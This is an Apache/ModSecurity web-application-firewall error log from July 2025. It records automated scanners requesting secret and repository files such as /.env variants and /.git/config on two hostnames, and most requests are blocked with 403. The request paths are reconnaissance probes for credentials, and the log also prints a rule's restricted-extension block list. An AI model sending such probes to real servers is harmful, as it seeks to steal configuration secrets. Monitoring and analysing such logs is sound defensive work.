[Mon Jul 14 05:24:27.286835 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/info/exclude"] [unique_id "aHR4a_duQ56bujdijAYibAAAAAI"]
[Mon Jul 14 05:24:27.390969 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /doc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/doc/.env"] [unique_id "aHR4a_duQ56bujdijAYibQAAAAI"]
[Mon Jul 14 05:24:27.391210 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/doc/.env"] [unique_id "aHR4a_duQ56bujdijAYibQAAAAI"]
[Mon Jul 14 05:24:27.391384 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/doc/.env"] [unique_id "aHR4a_duQ56bujdijAYibQAAAAI"]
[Mon Jul 14 05:24:27.460186 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.smtp_access"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.smtp_access"] [unique_id "aHR4a_duQ56bujdijAYibgAAAAI"]
[Mon Jul 14 05:24:27.460437 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.smtp_access"] [unique_id "aHR4a_duQ56bujdijAYibgAAAAI"]
[Mon Jul 14 05:24:27.460622 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.smtp_access"] [unique_id "aHR4a_duQ56bujdijAYibgAAAAI"]
[Mon Jul 14 05:24:27.508420 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHR4a_duQ56bujdijAYibwAAAAI"]
[Mon Jul 14 05:24:27.508581 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHR4a_duQ56bujdijAYibwAAAAI"]
[Mon Jul 14 05:24:27.508821 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHR4a_duQ56bujdijAYibwAAAAI"]
[Mon Jul 14 05:24:27.509015 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHR4a_duQ56bujdijAYibwAAAAI"]
[Tue Jul 15 13:43:53.951122 2025] [:error] [pid 1201330] [client 170.39.218.51:52978] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHY--aHROOik__uQSoZtDAAAAAM"]
[Tue Jul 15 13:43:53.952623 2025] [:error] [pid 1201330] [client 170.39.218.51:52978] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHY--aHROOik__uQSoZtDAAAAAM"]
[Tue Jul 15 13:43:53.952837 2025] [:error] [pid 1201330] [client 170.39.218.51:52978] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHY--aHROOik__uQSoZtDAAAAAM"]
[Tue Jul 15 13:43:54.273033 2025] [:error] [pid 1201332] [client 170.39.218.51:52982] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aHY--r5uLF3s7Kq_v1w0owAAAAQ"]
[Tue Jul 15 13:43:54.273322 2025] [:error] [pid 1201332] [client 170.39.218.51:52982] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aHY--r5uLF3s7Kq_v1w0owAAAAQ"]
[Tue Jul 15 13:43:54.273538 2025] [:error] [pid 1201332] [client 170.39.218.51:52982] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aHY--r5uLF3s7Kq_v1w0owAAAAQ"]
[Tue Jul 15 13:43:55.660801 2025] [:error] [pid 1197490] [client 170.39.218.51:52994] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aHY--wOevaFMKiEfRjwsFQAAAAE"]
[Tue Jul 15 13:43:55.661866 2025] [:error] [pid 1197490] [client 170.39.218.51:52994] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aHY--wOevaFMKiEfRjwsFQAAAAE"]
[Tue Jul 15 13:43:55.662095 2025] [:error] [pid 1197490] [client 170.39.218.51:52994] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aHY--wOevaFMKiEfRjwsFQAAAAE"]
[Tue Jul 15 13:43:56.057395 2025] [:error] [pid 1190830] [client 170.39.218.51:53008] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aHY-_Osj97E90f8z86GqwgAAAA0"]
[Tue Jul 15 13:43:56.057662 2025] [:error] [pid 1190830] [client 170.39.218.51:53008] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aHY-_Osj97E90f8z86GqwgAAAA0"]
[Tue Jul 15 13:43:56.057918 2025] [:error] [pid 1190830] [client 170.39.218.51:53008] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aHY-_Osj97E90f8z86GqwgAAAA0"]
[Tue Jul 15 13:43:56.336720 2025] [authz_core:error] [pid 1201356] [client 170.39.218.51:53020] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Tue Jul 15 13:43:56.778042 2025] [:error] [pid 1190804] [client 170.39.218.51:53026] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aHY-_JLwKqnY27ZpHOqzQAAAAAo"]
[Tue Jul 15 13:43:56.778309 2025] [:error] [pid 1190804] [client 170.39.218.51:53026] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aHY-_JLwKqnY27ZpHOqzQAAAAAo"]
[Tue Jul 15 13:43:56.778541 2025] [:error] [pid 1190804] [client 170.39.218.51:53026] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aHY-_JLwKqnY27ZpHOqzQAAAAAo"]
[Tue Jul 15 13:43:58.831721 2025] [:error] [pid 1201330] [client 170.39.218.51:53068] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aHY-_qHROOik__uQSoZtDQAAAAM"]
[Tue Jul 15 13:43:58.832235 2025] [:error] [pid 1201330] [client 170.39.218.51:53068] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aHY-_qHROOik__uQSoZtDQAAAAM"]
[Tue Jul 15 13:43:58.832507 2025] [:error] [pid 1201330] [client 170.39.218.51:53068] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aHY-_qHROOik__uQSoZtDQAAAAM"]
[Tue Jul 15 13:43:59.195389 2025] [:error] [pid 1201332] [client 170.39.218.51:53080] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aHY-_75uLF3s7Kq_v1w0pAAAAAQ"]
[Tue Jul 15 13:43:59.195640 2025] [:error] [pid 1201332] [client 170.39.218.51:53080] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aHY-_75uLF3s7Kq_v1w0pAAAAAQ"]
[Tue Jul 15 13:43:59.195823 2025] [:error] [pid 1201332] [client 170.39.218.51:53080] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aHY-_75uLF3s7Kq_v1w0pAAAAAQ"]
[Tue Jul 15 13:43:59.601941 2025] [:error] [pid 1197490] [client 170.39.218.51:53088] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aHY-_wOevaFMKiEfRjwsFgAAAAE"]
[Tue Jul 15 13:43:59.602288 2025] [:error] [pid 1197490] [client 170.39.218.51:53088] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aHY-_wOevaFMKiEfRjwsFgAAAAE"]
[Tue Jul 15 13:43:59.602579 2025] [:error] [pid 1197490] [client 170.39.218.51:53088] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aHY-_wOevaFMKiEfRjwsFgAAAAE"]
[Tue Jul 15 19:37:38.960775 2025] [:error] [pid 1209534] [client 195.178.110.68:53465] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHaR4gNNNGlqKeF4XQCBcQAAAA8"]
[Tue Jul 15 19:37:38.961080 2025] [:error] [pid 1209534] [client 195.178.110.68:53465] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHaR4gNNNGlqKeF4XQCBcQAAAA8"]
[Tue Jul 15 19:37:38.961263 2025] [:error] [pid 1209534] [client 195.178.110.68:53465] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHaR4gNNNGlqKeF4XQCBcQAAAA8"]
[Tue Jul 15 19:37:45.017429 2025] [:error] [pid 1209533] [client 195.178.110.68:59724] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHaR6WF8p5vH8U3onPGaPwAAAA0"]
